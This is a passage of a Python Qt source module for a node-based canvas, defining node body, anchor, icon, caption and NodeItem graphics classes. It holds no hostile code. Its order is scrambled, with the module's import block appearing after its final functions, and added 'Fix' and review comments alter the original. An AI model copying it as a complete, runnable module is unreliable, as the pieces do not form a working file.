            # drawArc uses 1/16-degree units: 57.60 == 5760 / 100 maps a
            # 0-100 progress value onto a full 360-degree sweep
            span = max(1, int(self.__progress * 57.60))
            painter.drawArc(self.__shapeRect, 90 * 16, -span)
            painter.restore()
    def __updateShadowState(self):
        # Focus is shown with a pen outline; hover/selection with a drop
        # shadow of increasing blur radius (animated when enabled).
        if self.__hasFocus:
            color = QColor(FOCUS_OUTLINE_COLOR)
            self.setPen(QPen(color, 1.5))
        else:
            self.setPen(QPen(Qt.NoPen))
        radius = 3
        enabled = False
        if self.__isSelected:
            enabled = True
            radius = 7
        if self.__hover:
            # hover takes precedence over selection
            radius = 17
            enabled = True
        if enabled and not self.shadow.isEnabled():
            self.shadow.setEnabled(enabled)
        if self.__animationEnabled:
            if self.__blurAnimation.state() == QPropertyAnimation.Running:
                self.__blurAnimation.pause()
            self.__blurAnimation.setStartValue(self.shadow.blurRadius())
            self.__blurAnimation.setEndValue(radius)
            self.__blurAnimation.start()
        else:
            self.shadow.setBlurRadius(radius)
    def __updateBrush(self):
        # Fill with a radial gradient taken from the palette color group
        # that matches the current selection state.
        palette = self.palette
        if self.__isSelected:
            cg = QPalette.Active
        else:
            cg = QPalette.Inactive
        palette.setCurrentColorGroup(cg)
        c1 = palette.color(QPalette.Light)
        c2 = palette.color(QPalette.Button)
        grad = radial_gradient(c2, c1)
        self.setBrush(QBrush(grad))
    # TODO: The selected and focus states should be set using the
    # QStyle flags (State_Selected. State_HasFocus)
    def setSelected(self, selected):
        """
        Set the `selected` state.
        .. note:: The item does not have `QGraphicsItem.ItemIsSelectable` flag.
        This property is instead controlled by the parent NodeItem.
        """
        self.__isSelected = selected
        self.__updateBrush()
    def setHasFocus(self, focus):
        """
        Set the `has focus` state.
        .. note:: The item does not have `QGraphicsItem.ItemIsFocusable` flag.
        This property is instead controlled by the parent NodeItem.
        """
        self.__hasFocus = focus
        self.__updateShadowState()
    def __on_finished(self):
        # fully disable the shadow effect once it has animated down to 0
        if self.shadow.blurRadius() == 0:
            self.shadow.setEnabled(False)
class AnchorPoint(QGraphicsObject):
    """
    An anchor indicator on the :class:`NodeAnchorItem`.
    """
    #: Signal emitted when the item's scene position changes.
    scenePositionChanged = Signal(QPointF)
    #: Signal emitted when the item's `anchorDirection` changes.
    anchorDirectionChanged = Signal(QPointF)
    def __init__(self, *args):
        QGraphicsObject.__init__(self, *args)
        self.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)
        # the item is a pure position marker and paints nothing itself
        self.setFlag(QGraphicsItem.ItemHasNoContents, True)
        self.__direction = QPointF()
    def anchorScenePos(self):
        """
        Return anchor position in scene coordinates.
        """
        return self.mapToScene(QPointF(0, 0))
    def setAnchorDirection(self, direction):
        """
        Set the preferred direction (QPointF) in item coordinates.
        Emits `anchorDirectionChanged` when the value actually changes.
        """
        if self.__direction != direction:
            self.__direction = direction
            self.anchorDirectionChanged.emit(direction)
    def anchorDirection(self):
        """
        Return the preferred anchor direction.
        """
        return self.__direction
    def itemChange(self, change, value):
        # re-broadcast scene-position changes as a Qt signal
        if change == QGraphicsItem.ItemScenePositionHasChanged:
            self.scenePositionChanged.emit(value)
        return QGraphicsObject.itemChange(self, change, value)
    def boundingRect(self,):
        # empty rect: nothing is painted (ItemHasNoContents is set)
        return QRectF()
class NodeAnchorItem(GraphicsPathObject):
    """
    The left/right widget input/output anchors.

    Draws the curved 'ear' along which individual :class:`AnchorPoint`
    items are laid out, and keeps those points positioned on the curve.
    """

    def __init__(self, parent, *args):
        GraphicsPathObject.__init__(self, parent, *args)
        self.setAcceptHoverEvents(True)
        self.setPen(QPen(Qt.NoPen))
        # Brush for the unconnected (dotted) state.
        self.normalBrush = QBrush(QColor("#CDD5D9"))
        # Brush used while at least one link is anchored here.
        self.connectedBrush = QBrush(QColor("#9CACB4"))
        self.setBrush(self.normalBrush)

        self.shadow = QGraphicsDropShadowEffect(
            blurRadius=10, color=QColor(SHADOW_COLOR), offset=QPointF(0, 0)
        )

        self.setGraphicsEffect(self.shadow)
        self.shadow.setEnabled(False)

        # Does this item have any anchored links.
        self.anchored = False

        if isinstance(parent, NodeItem):
            self.__parentNodeItem = parent
        else:
            self.__parentNodeItem = None

        self.__anchorPath = QPainterPath()
        # AnchorPoint items on this anchor and, in lock step, their
        # positions (0..1) along the anchor path.
        self.__points = []
        self.__pointPositions = []

        # Cached strokes of __anchorPath (built in setAnchorPath):
        # solid, dotted (unconnected) and a widened one for hit testing.
        self.__fullStroke = None
        self.__dottedStroke = None
        self.__shape = None

    def parentNodeItem(self):
        """
        Return a parent :class:`NodeItem` or ``None`` if this anchor's
        parent is not a :class:`NodeItem` instance.
        """
        return self.__parentNodeItem

    def setAnchorPath(self, path):
        """
        Set the anchor's curve path as a :class:`QPainterPath`.
        """
        self.prepareGeometryChange()
        # NOTE(review): __boundingRect is reset here but never defined or
        # read anywhere else in this class -- presumably vestigial; confirm.
        self.__boundingRect = None
        self.__anchorPath = path
        # Create a stroke of the path.
        stroke_path = QPainterPathStroker()
        stroke_path.setCapStyle(Qt.RoundCap)

        # Shape is wider (bigger mouse hit area - should be settable)
        stroke_path.setWidth(12)
        self.__shape = stroke_path.createStroke(path)

        # The full stroke
        stroke_path.setWidth(3)
        self.__fullStroke = stroke_path.createStroke(path)

        # The dotted stroke (when not connected to anything)
        stroke_path.setDashPattern(Qt.DotLine)
        self.__dottedStroke = stroke_path.createStroke(path)

        if self.anchored:
            self.setPath(self.__fullStroke)
            self.setBrush(self.connectedBrush)
        else:
            self.setPath(self.__dottedStroke)
            self.setBrush(self.normalBrush)

    def anchorPath(self):
        """
        Return the anchor path (:class:`QPainterPath`). This is a curve on
        which the anchor points lie.
        """
        return self.__anchorPath

    def setAnchored(self, anchored):
        """
        Set the items anchored state. When ``False`` the item draws it self
        with a dotted stroke.
        """
        self.anchored = anchored
        if anchored:
            self.setPath(self.__fullStroke)
            self.setBrush(self.connectedBrush)
        else:
            self.setPath(self.__dottedStroke)
            self.setBrush(self.normalBrush)

    def setConnectionHint(self, hint=None):
        """
        Set the connection hint. This can be used to indicate if
        a connection can be made or not.
        """
        # Intentionally abstract; subclasses elsewhere provide behavior.
        raise NotImplementedError

    def count(self):
        """
        Return the number of anchor points.
        """
        return len(self.__points)

    def addAnchor(self, anchor, position=0.5):
        """
        Add a new :class:`AnchorPoint` to this item and return it's index.

        The `position` specifies where along the `anchorPath` is the new
        point inserted.
        """
        return self.insertAnchor(self.count(), anchor, position)

    def insertAnchor(self, index, anchor, position=0.5):
        """
        Insert a new :class:`AnchorPoint` at `index`.

        See also
        --------
        NodeAnchorItem.addAnchor

        """
        if anchor in self.__points:
            raise ValueError("%s already added." % anchor)

        self.__points.insert(index, anchor)
        self.__pointPositions.insert(index, position)

        anchor.setParentItem(self)
        anchor.setPos(self.__anchorPath.pointAtPercent(position))
        # Keep bookkeeping consistent even if the point is destroyed
        # without going through takeAnchor/removeAnchor.
        anchor.destroyed.connect(self.__onAnchorDestroyed)

        self.__updatePositions()

        self.setAnchored(bool(self.__points))

        return index

    def removeAnchor(self, anchor):
        """
        Remove and delete the anchor point.
        """
        anchor = self.takeAnchor(anchor)

        anchor.hide()
        anchor.setParentItem(None)
        anchor.deleteLater()

    def takeAnchor(self, anchor):
        """
        Remove the anchor but don't delete it.
        """
        index = self.__points.index(anchor)

        del self.__points[index]
        del self.__pointPositions[index]

        anchor.destroyed.disconnect(self.__onAnchorDestroyed)

        self.__updatePositions()

        self.setAnchored(bool(self.__points))

        return anchor

    def __onAnchorDestroyed(self, anchor):
        # Drop a destroyed anchor point from the bookkeeping lists.
        try:
            index = self.__points.index(anchor)
        except ValueError:
            # Anchor not in list
            return

        del self.__points[index]
        del self.__pointPositions[index]

    def anchorPoints(self):
        """
        Return a list of anchor points.
        """
        return list(self.__points)

    def anchorPoint(self, index):
        """
        Return the anchor point at `index`.
        """
        return self.__points[index]

    def setAnchorPositions(self, positions):
        """
        Set the anchor positions in percentages (0..1) along the path curve.
        """
        if self.__pointPositions != positions:
            self.__pointPositions = list(positions)
            self.__updatePositions()

    def anchorPositions(self):
        """
        Return the positions of anchor points as a list of floats where
        each float is between 0 and 1 and specifies where along the anchor
        path does the point lie (0 is at start 1 is at the end).
        """
        return list(self.__pointPositions)

    def shape(self):
        # Use the widened stroke for mouse hit testing when available.
        if self.__shape is not None:
            return self.__shape
        else:
            return GraphicsPathObject.shape(self)

    def hoverEnterEvent(self, event):
        self.shadow.setEnabled(True)
        return GraphicsPathObject.hoverEnterEvent(self, event)

    def hoverLeaveEvent(self, event):
        self.shadow.setEnabled(False)
        return GraphicsPathObject.hoverLeaveEvent(self, event)

    def __updatePositions(self):
        """Update anchor points positions.
        """
        for point, t in zip(self.__points, self.__pointPositions):
            pos = self.__anchorPath.pointAtPercent(t)
            point.setPos(pos)
class SourceAnchorItem(NodeAnchorItem):
    """
    A source (output) anchor item.
    """
    pass
class SinkAnchorItem(NodeAnchorItem):
    """
    A sink (input) anchor item.
    """
    pass
def standard_icon(standard_pixmap):
    """
    Return the current application style's standard icon for a
    `QStyle.StandardPixmap` value.
    """
    app = QApplication.instance()
    return app.style().standardIcon(standard_pixmap)
class GraphicsIconItem(QGraphicsItem):
    """
    A graphics item displaying an :class:`QIcon`.
    """

    def __init__(self, parent=None, icon=None, iconSize=None, **kwargs):
        QGraphicsItem.__init__(self, parent, **kwargs)
        self.setFlag(QGraphicsItem.ItemUsesExtendedStyleOption, True)

        if icon is None:
            icon = QIcon()

        if iconSize is None:
            # Default to the style's large icon size.
            style = QApplication.instance().style()
            size = style.pixelMetric(style.PM_LargeIconSize)
            iconSize = QSize(size, size)

        self.__transformationMode = Qt.SmoothTransformation

        # Copy the inputs so later mutation by the caller has no effect.
        self.__iconSize = QSize(iconSize)
        self.__icon = QIcon(icon)

    def setIcon(self, icon):
        """
        Set the icon (:class:`QIcon`).
        """
        if self.__icon != icon:
            self.__icon = QIcon(icon)
            self.update()

    def icon(self):
        """
        Return the icon (:class:`QIcon`).
        """
        return QIcon(self.__icon)

    def setIconSize(self, size):
        """
        Set the icon (and this item's) size (:class:`QSize`).
        """
        if self.__iconSize != size:
            self.prepareGeometryChange()
            self.__iconSize = QSize(size)
            self.update()

    def iconSize(self):
        """
        Return the icon size (:class:`QSize`).
        """
        return QSize(self.__iconSize)

    def setTransformationMode(self, mode):
        """
        Set pixmap transformation mode. (`Qt.SmoothTransformation` or
        `Qt.FastTransformation`).
        """
        if self.__transformationMode != mode:
            self.__transformationMode = mode
            self.update()

    def transformationMode(self):
        """
        Return the pixmap transformation mode.
        """
        return self.__transformationMode

    def boundingRect(self):
        return QRectF(0, 0, self.__iconSize.width(), self.__iconSize.height())

    def paint(self, painter, option, widget=None):
        if not self.__icon.isNull():
            # Map the widget state to a QIcon mode.
            # NOTE(review): State_Active is tested after State_Enabled, so an
            # enabled item can never reach the Active branch -- confirm this
            # ordering is intended.
            if option.state & QStyle.State_Selected:
                mode = QIcon.Selected
            elif option.state & QStyle.State_Enabled:
                mode = QIcon.Normal
            elif option.state & QStyle.State_Active:
                mode = QIcon.Active
            else:
                mode = QIcon.Disabled

            w, h = self.__iconSize.width(), self.__iconSize.height()
            target = QRect(0, 0, w, h)
            painter.setRenderHint(
                QPainter.SmoothPixmapTransform,
                self.__transformationMode == Qt.SmoothTransformation,
            )
            self.__icon.paint(painter, target, Qt.AlignCenter, mode)
class NameTextItem(QGraphicsTextItem):
    """
    A text item for a node's caption that can draw a highlight
    rectangle behind its text lines when selected.
    """

    def __init__(self, *args, **kwargs):
        super(NameTextItem, self).__init__(*args, **kwargs)
        self.__selected = False
        self.__palette = None
        # Last HTML set via setHtml (used to skip redundant re-layout).
        self.__content = ""

    def paint(self, painter, option, widget=None):
        if self.__selected:
            # Draw a rounded highlight rect behind every laid-out text line.
            painter.save()
            painter.setPen(QPen(Qt.NoPen))
            painter.setBrush(self.palette().color(QPalette.Highlight))
            doc = self.document()
            margin = doc.documentMargin()
            painter.translate(margin, margin)
            offset = min(margin, 2)
            for line in self._lines(doc):
                rect = line.naturalTextRect()
                painter.drawRoundedRect(
                    rect.adjusted(-offset, -offset, offset, offset), 3, 3
                )

            painter.restore()

        super(NameTextItem, self).paint(painter, option, widget)

    def _blocks(self, doc):
        # Iterate over the document's text blocks.
        block = doc.begin()
        while block != doc.end():
            yield block
            block = block.next()

    def _lines(self, doc):
        # Iterate over all layout lines of all text blocks.
        for block in self._blocks(doc):
            blocklayout = block.layout()
            for i in range(blocklayout.lineCount()):
                yield blocklayout.lineAt(i)

    def setSelectionState(self, state):
        # Toggle the selection highlight and the matching text color.
        if self.__selected != state:
            self.__selected = state
            self.__updateDefaultTextColor()
            self.update()

    def setPalette(self, palette):
        if self.__palette != palette:
            self.__palette = QPalette(palette)
            self.__updateDefaultTextColor()
            self.update()

    def palette(self):
        # Fall back to the scene's palette when none was set explicitly.
        if self.__palette is None:
            scene = self.scene()
            if scene is not None:
                return scene.palette()
            else:
                return QPalette()
        else:
            return QPalette(self.__palette)

    def __updateDefaultTextColor(self):
        if self.__selected:
            role = QPalette.HighlightedText
        else:
            role = QPalette.WindowText
        self.setDefaultTextColor(self.palette().color(role))

    def setHtml(self, contents):
        # Avoid an expensive re-layout when the content did not change.
        if contents != self.__content:
            self.__content = contents
            super().setHtml(contents)
class NodeItem(QGraphicsWidget):
    """
    A widget node item in the canvas.

    Composes a :class:`NodeBodyItem`, input/output anchor items, a
    caption text item and error/warning/info message icons.
    """

    #: Signal emitted when the scene position of the node has changed.
    positionChanged = Signal()

    #: Signal emitted when the geometry of the channel anchors changes.
    anchorGeometryChanged = Signal()

    #: Signal emitted when the item has been activated (by a mouse double
    #: click or a keyboard)
    activated = Signal()

    #: The item is under the mouse.
    hovered = Signal()

    #: Span of the anchor in degrees
    ANCHOR_SPAN_ANGLE = 90

    #: Z value of the item
    Z_VALUE = 100

    def __init__(self, widget_description=None, parent=None, **kwargs):
        # Cached union of the child items' bounding rects; invalidated by
        # setting it to None (see boundingRect()).
        self.__boundingRect = None
        super().__init__(parent, **kwargs)
        self.setFocusPolicy(Qt.ClickFocus)
        self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)
        self.setFlag(QGraphicsItem.ItemHasNoContents, True)
        self.setFlag(QGraphicsItem.ItemIsSelectable, True)
        self.setFlag(QGraphicsItem.ItemIsMovable, True)
        self.setFlag(QGraphicsItem.ItemIsFocusable, True)

        # central body shape item
        self.shapeItem = None

        # in/output anchor items
        self.inputAnchorItem = None
        self.outputAnchorItem = None

        # title text item
        self.captionTextItem = None

        # error, warning, info items
        self.errorItem = None
        self.warningItem = None
        self.infoItem = None

        self.__title = ""
        self.__processingState = 0
        self.__progress = -1
        self.__statusMessage = ""

        self.__error = None
        self.__warning = None
        self.__info = None

        self.__anchorLayout = None
        self.__animationEnabled = False

        self.setZValue(self.Z_VALUE)
        self.setupGraphics()
        self.setWidgetDescription(widget_description)

    @classmethod
    def from_node(cls, node):
        """
        Create an :class:`NodeItem` instance and initialize it from a
        :class:`SchemeNode` instance.
        """
        self = cls()
        self.setWidgetDescription(node.description)
        # self.setCategoryDescription(node.category)
        return self

    @classmethod
    def from_node_meta(cls, meta_description):
        """
        Create an `NodeItem` instance from a node meta description.
        """
        self = cls()
        self.setWidgetDescription(meta_description)
        return self

    def setupGraphics(self):
        """
        Set up the graphics (body, anchors, caption and message icons).
        """
        shape_rect = QRectF(-24, -24, 48, 48)

        self.shapeItem = NodeBodyItem(self)
        self.shapeItem.setShapeRect(shape_rect)
        self.shapeItem.setAnimationEnabled(self.__animationEnabled)

        # Rect for widget's 'ears'.
        anchor_rect = QRectF(-31, -31, 62, 62)
        self.inputAnchorItem = SinkAnchorItem(self)
        input_path = QPainterPath()
        # Input anchor is an arc centered on the left (180 deg) side.
        start_angle = 180 - self.ANCHOR_SPAN_ANGLE / 2
        input_path.arcMoveTo(anchor_rect, start_angle)
        input_path.arcTo(anchor_rect, start_angle, self.ANCHOR_SPAN_ANGLE)
        self.inputAnchorItem.setAnchorPath(input_path)

        self.outputAnchorItem = SourceAnchorItem(self)
        output_path = QPainterPath()
        # Output anchor is the mirrored arc on the right (0 deg) side.
        start_angle = self.ANCHOR_SPAN_ANGLE / 2
        output_path.arcMoveTo(anchor_rect, start_angle)
        output_path.arcTo(anchor_rect, start_angle, -self.ANCHOR_SPAN_ANGLE)
        self.outputAnchorItem.setAnchorPath(output_path)

        self.inputAnchorItem.hide()
        self.outputAnchorItem.hide()

        # Title caption item
        self.captionTextItem = NameTextItem(self)

        self.captionTextItem.setPlainText("")
        self.captionTextItem.setPos(0, 33)

        def iconItem(standard_pixmap):
            # Small, initially hidden icon for a message severity indicator.
            item = GraphicsIconItem(
                self, icon=standard_icon(standard_pixmap), iconSize=QSize(16, 16)
            )
            item.hide()
            return item

        self.errorItem = iconItem(QStyle.SP_MessageBoxCritical)
        self.warningItem = iconItem(QStyle.SP_MessageBoxWarning)
        self.infoItem = iconItem(QStyle.SP_MessageBoxInformation)

        self.prepareGeometryChange()
        self.__boundingRect = None

    # TODO: Remove the set[Widget|Category]Description. The user should
    # handle setting of icons, title, ...
    def setWidgetDescription(self, desc):
        """
        Set widget description.
        """
        self.widget_description = desc
        if desc is None:
            return

        icon = icon_loader.from_description(desc).get(desc.icon)
        if icon:
            self.setIcon(icon)

        if not self.title():
            self.setTitle(desc.name)

        # Only show the anchors the widget actually has channels for.
        if desc.inputs:
            self.inputAnchorItem.show()
        if desc.outputs:
            self.outputAnchorItem.show()

        tooltip = NodeItem_toolTipHelper(self)
        self.setToolTip(tooltip)

    def setWidgetCategory(self, desc):
        """
        Set the widget category.
        """
        self.category_description = desc
        if desc and desc.background:
            background = NAMED_COLORS.get(desc.background, desc.background)
            color = QColor(background)
            if color.isValid():
                self.setColor(color)

    def setIcon(self, icon):
        """
        Set the node item's icon (:class:`QIcon`).
        """
        if isinstance(icon, QIcon):
            self.icon_item = GraphicsIconItem(
                self.shapeItem, icon=icon, iconSize=QSize(36, 36)
            )
            # Center the 36x36 icon on the body.
            self.icon_item.setPos(-18, -18)
        else:
            raise TypeError

    def setColor(self, color, selectedColor=None):
        """
        Set the widget color.
        """
        if selectedColor is None:
            selectedColor = saturated(color, 150)
        palette = create_palette(color, selectedColor)
        self.shapeItem.setPalette(palette)

    def setTitle(self, title):
        """
        Set the node title. The title text is displayed at the bottom of the
        node.
        """
        self.__title = title
        self.__updateTitleText()

    def title(self):
        """
        Return the node title.
        """
        return self.__title

    title_ = Property(str, fget=title, fset=setTitle, doc="Node title text.")

    def setFont(self, font):
        """
        Set the title text font (:class:`QFont`).
        """
        if font != self.font():
            self.prepareGeometryChange()
            self.captionTextItem.setFont(font)
            self.__updateTitleText()

    def font(self):
        """
        Return the title text font.
        """
        return self.captionTextItem.font()

    def setAnimationEnabled(self, enabled):
        """
        Set the node animation enabled state.
        """
        if self.__animationEnabled != enabled:
            self.__animationEnabled = enabled
            self.shapeItem.setAnimationEnabled(enabled)

    def animationEnabled(self):
        """
        Are node animations enabled.
        """
        return self.__animationEnabled

    def setProcessingState(self, state):
        """
        Set the node processing state i.e. the node is processing
        (is busy) or is idle.
        """
        if self.__processingState != state:
            self.__processingState = state
            self.shapeItem.setProcessingState(state)
            if not state:
                # Clear the progress meter.
                self.setProgress(-1)
                if self.__animationEnabled:
                    self.shapeItem.ping()

    def processingState(self):
        """
        The node processing state.
        """
        return self.__processingState

    processingState_ = Property(int, fget=processingState, fset=setProcessingState)

    def setProgress(self, progress):
        """
        Set the node work progress state (number between 0 and 100).
        """
        # Progress outside a processing state collapses to -1 (hidden);
        # otherwise it is clamped to [-1, 100].
        if progress is None or progress < 0 or not self.__processingState:
            progress = -1

        progress = max(min(progress, 100), -1)
        if self.__progress != progress:
            self.__progress = progress
            self.shapeItem.setProgress(progress)
            self.__updateTitleText()

    def progress(self):
        """
        Return the node work progress state.
        """
        return self.__progress

    progress_ = Property(
        float, fget=progress, fset=setProgress, doc="Node progress state."
    )

    def setStatusMessage(self, message):
        """
        Set the node status message text.

        This text is displayed below the node's title.
        """
        if self.__statusMessage != message:
            self.__statusMessage = message
            self.__updateTitleText()

    def statusMessage(self):
        """
        Return the node status message text.
        """
        return self.__statusMessage

    def setStateMessage(self, message):
        """
        Set a state message to display over the item.

        Parameters
        ----------
        message : UserMessage
            Message to display. `message.severity` is used to determine
            the icon and `message.contents` is used as a tool tip.

        """
        # TODO: Group messages by message_id not by severity
        # and deprecate set[Error|Warning|Error]Message
        if message.severity == UserMessage.Info:
            self.setInfoMessage(message.contents)
        elif message.severity == UserMessage.Warning:
            self.setWarningMessage(message.contents)
        elif message.severity == UserMessage.Error:
            self.setErrorMessage(message.contents)

    def setErrorMessage(self, message):
        # `message` is a string or None (cleared).
        if self.__error != message:
            self.__error = message
            self.__updateMessages()

    def setWarningMessage(self, message):
        if self.__warning != message:
            self.__warning = message
            self.__updateMessages()

    def setInfoMessage(self, message):
        if self.__info != message:
            self.__info = message
            self.__updateMessages()

    def newInputAnchor(self):
        """
        Create and return a new input :class:`AnchorPoint`.

        Raises
        ------
        ValueError
            If the widget description declares no inputs.
        """
        if not (self.widget_description and self.widget_description.inputs):
            raise ValueError("Widget has no inputs.")

        anchor = AnchorPoint()
        self.inputAnchorItem.addAnchor(anchor, position=1.0)

        # Re-distribute all anchor points evenly along the anchor curve.
        positions = self.inputAnchorItem.anchorPositions()
        positions = uniform_linear_layout(positions)
        self.inputAnchorItem.setAnchorPositions(positions)

        return anchor

    def removeInputAnchor(self, anchor):
        """
        Remove input anchor.
        """
        self.inputAnchorItem.removeAnchor(anchor)

        positions = self.inputAnchorItem.anchorPositions()
        positions = uniform_linear_layout(positions)
        self.inputAnchorItem.setAnchorPositions(positions)

    def newOutputAnchor(self):
        """
        Create and return a new output :class:`AnchorPoint`.

        Raises
        ------
        ValueError
            If the widget description declares no outputs.
        """
        if not (self.widget_description and self.widget_description.outputs):
            raise ValueError("Widget has no outputs.")

        anchor = AnchorPoint(self)
        self.outputAnchorItem.addAnchor(anchor, position=1.0)

        positions = self.outputAnchorItem.anchorPositions()
        positions = uniform_linear_layout(positions)
        self.outputAnchorItem.setAnchorPositions(positions)

        return anchor

    def removeOutputAnchor(self, anchor):
        """
        Remove output anchor.
        """
        self.outputAnchorItem.removeAnchor(anchor)

        positions = self.outputAnchorItem.anchorPositions()
        positions = uniform_linear_layout(positions)
        self.outputAnchorItem.setAnchorPositions(positions)

    def inputAnchors(self):
        """
        Return a list of all input anchor points.
        """
        return self.inputAnchorItem.anchorPoints()

    def outputAnchors(self):
        """
        Return a list of all output anchor points.
        """
        return self.outputAnchorItem.anchorPoints()

    def setAnchorRotation(self, angle):
        """
        Set the anchor rotation.
        """
        self.inputAnchorItem.setRotation(angle)
        self.outputAnchorItem.setRotation(angle)
        self.anchorGeometryChanged.emit()

    def anchorRotation(self):
        """
        Return the anchor rotation.
        """
        return self.inputAnchorItem.rotation()

    def boundingRect(self):
        # TODO: Important because of this any time the child
        # items change geometry the self.prepareGeometryChange()
        # needs to be called.
        if self.__boundingRect is None:
            self.__boundingRect = self.childrenBoundingRect()
        return self.__boundingRect

    def shape(self):
        # Shape for mouse hit detection.
        # TODO: Should this return the union of all child items?
        return self.shapeItem.shape()

    def __updateTitleText(self):
        """
        Update the title text item (title plus optional status/progress).
        """
        text = ['<div align="center">%s' % escape(self.title())]

        status_text = []

        progress_included = False
        if self.__statusMessage:
            msg = escape(self.__statusMessage)
            format_fields = dict(parse_format_fields(msg))
            if "progress" in format_fields and len(format_fields) == 1:
                # Insert progress into the status text format string.
                spec, _ = format_fields["progress"]
                if spec != None:
                    progress_included = True
                    progress_str = "{0:.0f}%".format(self.progress())
                    status_text.append(msg.format(progress=progress_str))
            else:
                status_text.append(msg)

        # Append a bare percentage unless the status message already
        # embedded the progress value.
        if self.progress() >= 0 and not progress_included:
            status_text.append("%i%%" % int(self.progress()))

        if status_text:
            text += [
                "<br/>",
                '<span style="font-style: italic">',
                "<br/>".join(status_text),
                "</span>",
            ]
        text += ["</div>"]
        text = "".join(text)

        # The NodeItems boundingRect could change.
        self.prepareGeometryChange()
        self.__boundingRect = None
        self.captionTextItem.setHtml(text)
        self.captionTextItem.document().adjustSize()
        width = self.captionTextItem.textWidth()
        # Keep the caption horizontally centered below the body.
        self.captionTextItem.setPos(-width / 2.0, 33)

    def __updateMessages(self):
        """
        Update message items (position, visibility and tool tips).
        """
        items = [self.errorItem, self.warningItem, self.infoItem]
        messages = [self.__error, self.__warning, self.__info]
        for message, item in zip(messages, items):
            item.setVisible(bool(message))
            item.setToolTip(message or "")

        shown = [item for item in items if item.isVisible()]
        count = len(shown)
        if count:
            # Lay the visible icons out in a row centered above the body.
            spacing = 3
            rects = [item.boundingRect() for item in shown]
            width = sum(rect.width() for rect in rects)
            width += spacing * max(0, count - 1)
            height = max(rect.height() for rect in rects)
            origin = self.shapeItem.boundingRect().top() - spacing - height
            origin = QPointF(-width / 2, origin)
            for item, rect in zip(shown, rects):
                item.setPos(origin)
                origin = origin + QPointF(rect.width() + spacing, 0)

    def mousePressEvent(self, event):
        # Only react to presses inside the body shape, not the whole
        # (rectangular) bounding rect.
        if self.shapeItem.path().contains(event.pos()):
            return super().mousePressEvent(event)
        else:
            event.ignore()

    def mouseDoubleClickEvent(self, event):
        if self.shapeItem.path().contains(event.pos()):
            super().mouseDoubleClickEvent(event)
            # Emit from the event loop, after the event is fully handled.
            QTimer.singleShot(0, self.activated.emit)
        else:
            event.ignore()

    def contextMenuEvent(self, event):
        if self.shapeItem.path().contains(event.pos()):
            return super().contextMenuEvent(event)
        else:
            event.ignore()

    def focusInEvent(self, event):
        self.shapeItem.setHasFocus(True)
        return super().focusInEvent(event)

    def focusOutEvent(self, event):
        self.shapeItem.setHasFocus(False)
        return super().focusOutEvent(event)

    def changeEvent(self, event):
        if event.type() == QEvent.PaletteChange:
            self.__updatePalette()
        elif event.type() == QEvent.FontChange:
            self.__updateFont()
        super().changeEvent(event)

    def itemChange(self, change, value):
        if change == QGraphicsItem.ItemSelectedChange:
            # Forward the selection state to the body and caption items.
            self.shapeItem.setSelected(value)
            self.captionTextItem.setSelectionState(value)
        elif change == QGraphicsItem.ItemPositionHasChanged:
            self.positionChanged.emit()
        return super().itemChange(change, value)

    def __updatePalette(self):
        self.captionTextItem.setPalette(self.palette())

    def __updateFont(self):
        self.prepareGeometryChange()
        self.captionTextItem.setFont(self.font())
        self.__updateTitleText()
# Skeleton HTML document used by NodeItem_toolTipHelper; `style` receives a
# CSS block and `tooltip` the body markup.
TOOLTIP_TEMPLATE = """\
<html>
<head>
<style type="text/css">
{style}
</style>
</head>
<body>
{tooltip}
</body>
</html>
"""
def NodeItem_toolTipHelper(node, links_in=None, links_out=None):
    """
    A helper function for constructing a standard tooltip for the node
    in on the canvas.

    Parameters
    ----------
    node : NodeItem
        The node item instance.
    links_in : list of LinkItem instances, optional
        A list of input links for the node (currently unused).
    links_out : list of LinkItem instances, optional
        A list of output links for the node (currently unused).
    """
    # Fix: mutable default arguments ([]) replaced with None sentinels;
    # the parameters are unused in the body, but shared mutable defaults
    # are a classic Python pitfall and the change is call-compatible.
    if links_in is None:
        links_in = []
    if links_out is None:
        links_out = []
    desc = node.widget_description
    channel_fmt = "<li>{0}</li>"

    title_fmt = "<b>{title}</b><hr/>"
    title = title_fmt.format(title=escape(node.title()))
    inputs_list_fmt = "Inputs:<ul>{inputs}</ul><hr/>"
    outputs_list_fmt = "Outputs:<ul>{outputs}</ul>"
    if desc.inputs:
        inputs = [channel_fmt.format(inp.name) for inp in desc.inputs]
        inputs = inputs_list_fmt.format(inputs="".join(inputs))
    else:
        inputs = "No inputs<hr/>"

    if desc.outputs:
        outputs = [channel_fmt.format(out.name) for out in desc.outputs]
        outputs = outputs_list_fmt.format(outputs="".join(outputs))
    else:
        outputs = "No outputs"

    tooltip = title + inputs + outputs
    style = "ul { margin-top: 1px; margin-bottom: 1px; }"

    return TOOLTIP_TEMPLATE.format(style=style, tooltip=tooltip)
def parse_format_fields(format_str):
    """
    Return the replacement fields in `format_str`.

    Each entry is a ``(field_name, (format_spec, conversion))`` tuple as
    reported by :class:`string.Formatter`; literal-only segments (where
    the field name is None) are excluded.
    """
    formatter = string.Formatter()
    format_fields = [
        (field, (spec, conv))
        for _, field, spec, conv in formatter.parse(format_str)
        if field is not None
    ]
    # Fix: the original closing line was corrupted by an extraction join
    # (repo path fused into the `return` statement); restore the return and
    # the `import string` that opens the duplicated module copy below.
    return format_fields


import string
from xml.sax.saxutils import escape
from AnyQt.QtWidgets import (
QGraphicsItem,
QGraphicsObject,
QGraphicsTextItem,
QGraphicsWidget,
QGraphicsDropShadowEffect,
QStyle,
QApplication,
)
from AnyQt.QtGui import (
QPen,
QBrush,
QColor,
QPalette,
QIcon,
QPainter,
QPainterPath,
QPainterPathStroker,
)
from AnyQt.QtCore import (
Qt,
QEvent,
QPointF,
QRectF,
QRect,
QSize,
QTimer,
QPropertyAnimation,
)
from AnyQt.QtCore import pyqtSignal as Signal, pyqtProperty as Property
from .graphicspathobject import GraphicsPathObject
from .utils import saturated, radial_gradient
from ...scheme.node import UserMessage
from ...registry import NAMED_COLORS
from ...resources import icon_loader
from .utils import uniform_linear_layout
def create_palette(light_color, color):
    """
    Return a new :class:`QPalette` for the :class:`NodeBodyItem`.

    `light_color` fills the Inactive color group and `color` the Active
    one; each group gets Light/Midlight/Button shades derived from its
    base color.
    """
    palette = QPalette()
    for group, base in ((QPalette.Inactive, light_color),
                        (QPalette.Active, color)):
        palette.setColor(group, QPalette.Light, saturated(base, 50))
        palette.setColor(group, QPalette.Midlight, saturated(base, 90))
        palette.setColor(group, QPalette.Button, base)
